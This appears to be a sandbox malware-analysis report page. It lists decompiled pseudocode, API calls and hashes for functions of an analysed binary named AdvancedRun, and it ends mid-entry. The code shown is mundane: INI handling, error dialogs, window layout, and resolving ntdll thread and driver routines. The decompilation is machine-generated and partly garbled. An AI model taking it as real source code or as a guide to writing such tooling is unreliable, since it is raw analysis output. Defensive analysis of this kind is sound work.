                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen_snwprintfmemset
                                                                  • String ID: %s\shell\%s
                                                                  • API String ID: 1458959524-3196117466
                                                                  • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                  • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                  • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                  • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 16%
                                                                  			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                  0x00409d5f
                                                                  0x00409d67
                                                                  0x00409d70
                                                                  0x00409ddb
                                                                  0x00409d72
                                                                  0x00409d74
                                                                  0x00409db2
                                                                  0x00409d84
                                                                  0x00409d84
                                                                  0x00409d8c
                                                                  0x00409d8d
                                                                  0x00409d98
                                                                  0x00409d9d
                                                                  0x00409d9e
                                                                  0x00409da6
                                                                  0x00409daf
                                                                  0x00409daf
                                                                  0x00409dc3
                                                                  0x00409dc3

                                                                  APIs
                                                                  • wcschr.MSVCRT ref: 00409D79
                                                                  • _snwprintf.MSVCRT ref: 00409D9E
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 00409DD4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                  • String ID: "%s"
                                                                  • API String ID: 1343145685-3297466227
                                                                  • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                  • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                  • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                  • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 38%
                                                                  			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                  0x004047d2
                                                                  0x004047da
                                                                  0x004047e0
                                                                  0x004047e4
                                                                  0x004047ec
                                                                  0x004047ec
                                                                  0x004047f5
                                                                  0x00404800
                                                                  0x00404801
                                                                  0x00404802
                                                                  0x0040480d
                                                                  0x00404812
                                                                  0x00404813
                                                                  0x00404834

                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                  • _snwprintf.MSVCRT ref: 00404813
                                                                  • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                  • String ID: Error$Error %d: %s
                                                                  • API String ID: 313946961-1552265934
                                                                  • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                  • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                  • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                  • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 90%
                                                                  			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                  0x004068ec
                                                                  0x004068f0
                                                                  0x004068f4
                                                                  0x004068ff
                                                                  0x00406902
                                                                  0x0040690a
                                                                  0x00406910
                                                                  0x00406911
                                                                  0x0040691b
                                                                  0x0040691e
                                                                  0x00406923
                                                                  0x0040692d
                                                                  0x0040692e
                                                                  0x00406933
                                                                  0x0040693d
                                                                  0x00406940
                                                                  0x00406949
                                                                  0x0040694a
                                                                  0x00406950
                                                                  0x00406956
                                                                  0x00406959
                                                                  0x0040695c
                                                                  0x00406964
                                                                  0x0040696d
                                                                  0x00406974
                                                                  0x0040697e
                                                                  0x00406989
                                                                  0x00406990
                                                                  0x00406998
                                                                  0x0040699b
                                                                  0x0040699f
                                                                  0x004069b8
                                                                  0x004069bc
                                                                  0x004069c4
                                                                  0x004069c7
                                                                  0x004069c7
                                                                  0x004069cb
                                                                  0x004069ce
                                                                  0x004069d4
                                                                  0x004069d4
                                                                  0x004069d9
                                                                  0x004069df
                                                                  0x004069e6
                                                                  0x004069ea
                                                                  0x004069ef
                                                                  0x004069f2
                                                                  0x004069f5
                                                                  0x00406a00
                                                                  0x00406a01
                                                                  0x00406a06
                                                                  0x00406a08
                                                                  0x00406a0b
                                                                  0x00406a10
                                                                  0x00406a16
                                                                  0x00406a25
                                                                  0x00406a25
                                                                  0x00406a18
                                                                  0x00406a1e
                                                                  0x00406a1e
                                                                  0x00406a27
                                                                  0x00406a2f
                                                                  0x00406a32
                                                                  0x00406a35
                                                                  0x00406a3b
                                                                  0x00406a41
                                                                  0x00406a47
                                                                  0x00406a4d
                                                                  0x00406a53
                                                                  0x00406a5d
                                                                  0x00406a6d

                                                                  APIs
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                  • memcpy.MSVCRT ref: 0040696D
                                                                  • memcpy.MSVCRT ref: 0040697E
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                  • String ID:
                                                                  • API String ID: 975042529-0
                                                                  • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                  • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                  • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                  • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 83%
                                                                  			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                  0x004097b1
                                                                  0x004097b9
                                                                  0x004097bb
                                                                  0x004097be
                                                                  0x004097c3
                                                                  0x004097ca
                                                                  0x004097de
                                                                  0x004097de
                                                                  0x004097e3
                                                                  0x004097e5
                                                                  0x004097e5
                                                                  0x004097ec
                                                                  0x004097f3
                                                                  0x004097f6
                                                                  0x004097fe
                                                                  0x00409802
                                                                  0x00409805
                                                                  0x0040980a
                                                                  0x0040980d
                                                                  0x00409810
                                                                  0x00409822
                                                                  0x00000000
                                                                  0x00409827
                                                                  0x0040982a
                                                                  0x004098da
                                                                  0x004098da
                                                                  0x004098dc
                                                                  0x004098e0
                                                                  0x004098e9
                                                                  0x004098ec
                                                                  0x004098f6
                                                                  0x004098f6
                                                                  0x004098e2
                                                                  0x00000000
                                                                  0x004098e2
                                                                  0x00409830
                                                                  0x00409833
                                                                  0x00409838
                                                                  0x0040983b
                                                                  0x0040983e
                                                                  0x0040985f
                                                                  0x0040985f
                                                                  0x00409861
                                                                  0x00409863
                                                                  0x0040989e
                                                                  0x004098b1
                                                                  0x004098b8
                                                                  0x004098c0
                                                                  0x004098c5
                                                                  0x004098d5
                                                                  0x00409865
                                                                  0x00409865
                                                                  0x00409865
                                                                  0x0040986c
                                                                  0x00409878
                                                                  0x0040987f
                                                                  0x0040988a
                                                                  0x0040988f
                                                                  0x0040988f
                                                                  0x0040986c
                                                                  0x00000000
                                                                  0x00409863
                                                                  0x00409840
                                                                  0x00409843
                                                                  0x00409846
                                                                  0x0040984b
                                                                  0x00409852
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409854
                                                                  0x0040985d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040985d
                                                                  0x00409894
                                                                  0x00000000
                                                                  0x00409894

                                                                  APIs
                                                                    • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                  • memset.MSVCRT ref: 00409805
                                                                  • memcpy.MSVCRT ref: 0040988A
                                                                  • memcpy.MSVCRT ref: 004098C0
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                  • String ID:
                                                                  • API String ID: 3641025914-0
                                                                  • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                  • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                  • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                  • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 68%
                                                                  			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                  0x004067ac
                                                                  0x004067af
                                                                  0x004067b5
                                                                  0x004067ba
                                                                  0x004067bf
                                                                  0x004067c1
                                                                  0x004067c6
                                                                  0x004067c7
                                                                  0x004067cc
                                                                  0x004067cd
                                                                  0x004067d2
                                                                  0x004067d4
                                                                  0x004067d9
                                                                  0x004067da
                                                                  0x004067df
                                                                  0x004067e0
                                                                  0x004067e5
                                                                  0x004067e7
                                                                  0x004067ec
                                                                  0x004067ed
                                                                  0x004067f2
                                                                  0x004067f3
                                                                  0x004067f8
                                                                  0x004067fa
                                                                  0x004067ff
                                                                  0x00406800
                                                                  0x00406805
                                                                  0x00406806
                                                                  0x00406808
                                                                  0x0040680f
                                                                  0x00406810
                                                                  0x00406812
                                                                  0x00406817
                                                                  0x0040681e
                                                                  0x00406828
                                                                  0x0040682b
                                                                  0x0040682c
                                                                  0x0040681e
                                                                  0x00406835
                                                                  0x00406839
                                                                  0x00406841

                                                                  APIs
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                  • free.MSVCRT(00000000), ref: 00406839
                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$free
                                                                  • String ID:
                                                                  • API String ID: 2241099983-0
                                                                  • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                  • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                  • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                  • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                  0x00405d03
                                                                  0x00405d06
                                                                  0x00405d10
                                                                  0x00405d17
                                                                  0x00405d22
                                                                  0x00405d32
                                                                  0x00405d40
                                                                  0x00405d48
                                                                  0x00405d4e
                                                                  0x00405d54
                                                                  0x00405d59
                                                                  0x00405d5c
                                                                  0x00405d61
                                                                  0x00405d67

                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00405D0A
                                                                  • GetWindowRect.USER32 ref: 00405D17
                                                                  • GetClientRect.USER32 ref: 00405D22
                                                                  • MapWindowPoints.USER32 ref: 00405D32
                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                  • String ID:
                                                                  • API String ID: 4247780290-0
                                                                  • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                  • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                  • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                  • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                  Download Yara Rule
